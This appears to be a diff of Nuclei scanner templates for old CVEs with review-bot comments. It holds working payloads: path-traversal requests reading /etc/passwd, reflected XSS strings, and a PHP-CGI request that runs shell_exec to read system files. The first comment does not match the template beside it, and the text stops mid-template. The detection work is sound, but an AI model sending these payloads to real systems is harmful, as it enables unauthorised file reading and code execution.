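Review bot: the `description` is the project's own blurb (with "semplifying", "Elsewere", "hyerarchize") and never states the vulnerability; it should say what the `rfi` tag and the path indicate, that `adm/krgourl.php` fetches a remote location supplied in `DOCUMENT_ROOT`. In the matchers, the `interactsh_protocol` hit is the evidence of inclusion, so also requiring `status: 200` under `matchers-condition: and` could hide a hit when the page errors after fetching the remote URL.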
@ -0,0 +1,27 @@
|
|||
id: CVE-2009-5114
|
||||
|
||||
info:
|
||||
name: WebGlimpse 2.18.7 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/36994
|
||||
- https://www.cvedetails.com/cve/CVE-2009-5114
|
||||
tags: cve,cve2009,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2010-2307
|
||||
|
||||
info:
|
||||
name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
|
||||
reference: |
|
||||
- https://www.securityfocus.com/bid/40550/info
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
|
||||
tags: cve,cve2010,iot,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
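Review bot: `path` tests only the plain `../` form (`{{BaseURL}}/../../etc/passwd`), while the description lists three variants: multiple leading slashes, `../` sequences, and encoded dot dot sequences. A plain `../` at the start of the path is the form most likely to be collapsed by a client or intermediary before it reaches the device, so adding the `//` and encoded variants as extra paths would make the check more reliable.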
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2682
|
||||
|
||||
info:
|
||||
name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/14017
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2682
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,7 +4,10 @@ info:
|
|||
name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
|
||||
description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.
|
||||
reference: |
|
||||
- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
|
||||
- http://www.adobe.com/support/security/bulletins/apsb10-18.html
|
||||
tags: cve,cve2010,coldfusion,lfi
|
||||
|
||||
requests:
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2010-4231
|
||||
|
||||
info:
|
||||
name: Camtron CMNC-200 IP Camera - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
|
||||
- https://www.exploit-db.com/exploits/15505
|
||||
tags: cve,cve2010,iot,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-4617
|
||||
|
||||
info:
|
||||
name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/15791
|
||||
- https://www.cvedetails.com/cve/CVE-2010-4617
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
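Review bot: the query string in `path` reads `option=com_jotloader§ion=...`, but the description names the `section` parameter, so `&sect` looks to have been turned into the `§` character somewhere. Check that the committed file contains a literal `&section=`; as shown, the request carries no `section` parameter and cannot reach the traversal.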
@ -0,0 +1,29 @@
|
|||
id: CVE-2011-0049
|
||||
|
||||
info:
|
||||
name: Majordomo2 - SMTP/HTTP Directory Traversal
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/16103
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2011-0063
|
||||
- http://www.kb.cert.org/vuls/id/363726
|
||||
tags: cve,cve2011,majordomo2,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
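Review bot: the second `reference` entry links to CVE-2011-0063 while the template `id` is CVE-2011-0049; point it at the NVD entry for the id or explain why both apply. The `condition: and` under the single-pattern regex matcher has no effect and can go.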
@ -0,0 +1,27 @@
|
|||
id: CVE-2011-1669
|
||||
|
||||
info:
|
||||
name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
|
||||
reference: |
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
|
||||
- https://www.exploit-db.com/exploits/17119
|
||||
tags: cve,cve2011,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2011-3315
|
||||
|
||||
info:
|
||||
name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.
|
||||
reference: https://www.exploit-db.com/exploits/36256
|
||||
tags: cve,cve2011,lfi,cisco
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2011-4336
|
||||
|
||||
info:
|
||||
name: Tiki Wiki CMS Groupware 7.0 has XSS
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php.
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2011-4336
|
||||
- https://www.securityfocus.com/bid/48806/info
|
||||
- https://seclists.org/bugtraq/2011/Nov/140
|
||||
tags: cve,cve2011,xss,tikiwiki
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2011-4618
|
||||
|
||||
info:
|
||||
name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618
|
||||
tags: cve,cve2011,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2011-4624
|
||||
|
||||
info:
|
||||
name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624
|
||||
tags: cve,cve2011,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2011-4804
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_kp - 'Controller' Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/36598
|
||||
- https://www.cvedetails.com/cve/CVE-2011-4804
|
||||
tags: cve,cve2011,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
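Review bot: `name` and `path` target `com_kp`, but the description is about the obSuggest (`com_obsuggest`) component. One of them is wrong for CVE-2011-4804; align the name, the `option=` value and the description to the same component before merging.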
@ -0,0 +1,30 @@
|
|||
id: CVE-2011-4926
|
||||
|
||||
info:
|
||||
name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926
|
||||
tags: cve,cve2011,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2011-5106
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5106
|
||||
tags: cve,cve2011,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2011-5107
|
||||
|
||||
info:
|
||||
name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107
|
||||
tags: cve,cve2011,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2011-5179
|
||||
|
||||
info:
|
||||
name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179
|
||||
tags: cve,cve2011,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2011-5181
|
||||
|
||||
info:
|
||||
name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181
|
||||
tags: cve,cve2011,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2011-5265
|
||||
|
||||
info:
|
||||
name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265
|
||||
tags: cve,cve2011,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Apache Struts2 S2-008 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
|
||||
reference: https://blog.csdn.net/weixin_43416469/article/details/113850545
|
||||
tags: cve,cve2012,apache,rce,struts
|
||||
|
||||
|
@ -17,7 +18,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2012-0901
|
||||
|
||||
info:
|
||||
name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901
|
||||
tags: cve,cve2012,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2012-0991
|
||||
|
||||
info:
|
||||
name: OpenEMR 4.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/36650
|
||||
- https://www.cvedetails.com/cve/CVE-2012-0991
|
||||
tags: cve,cve2012,lfi,openemr
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
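Review bot: the description says the traversal is open to remote authenticated users, but the GET to `contrib/acog/print_form.php` carries no session cookie or login step, so on an installation that enforces login the template reports nothing and that reads as not vulnerable. Document the precondition in `info`. The `%00` suffix also depends on a PHP version that still truncates paths at a null byte, which is worth a line in the description.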
@ -0,0 +1,35 @@
|
|||
id: CVE-2012-1823
|
||||
|
||||
info:
|
||||
name: PHP CGI v5.3.12/5.4.2 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: |
|
||||
- https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2012-1823
|
||||
description: |
|
||||
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
|
||||
tags: rce,php,cve,cve2012
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 31
|
||||
|
||||
<?php echo shell_exec("cat /etc/passwd"); ?>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
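Review bot: `Content-Length: 31` in the raw request does not match the body that follows, which is 44 bytes as written. Remove the hard-coded header so the length is computed from the body instead of depending on how the engine treats a wrong value. The `condition: and` under the single-entry regex matcher is also redundant.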
@ -0,0 +1,34 @@
|
|||
id: CVE-2012-1835
|
||||
|
||||
info:
|
||||
name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835
|
||||
tags: cve,cve2012,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
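Review bot: the four commented-out paths under `path:` use `alert(123)` payloads that the body matcher (`</script><script>alert(document.domain)</script>`) could never match, so they cannot simply be uncommented later. Remove them or rewrite them with the matched payload, since the description lists seven parameters and only `title` on `agenda-widget.php` is checked.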
@ -0,0 +1,30 @@
|
|||
id: CVE-2012-2371
|
||||
|
||||
info:
|
||||
name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-2371
|
||||
tags: cve,cve2012,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2012-3153
|
||||
|
||||
info:
|
||||
name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)
|
||||
author: Sid Ahmed MALAOUI @ Realistic Security
|
||||
severity: critical
|
||||
description: |
|
||||
Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,
|
||||
11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown
|
||||
vectors related to Report Server Component.
|
||||
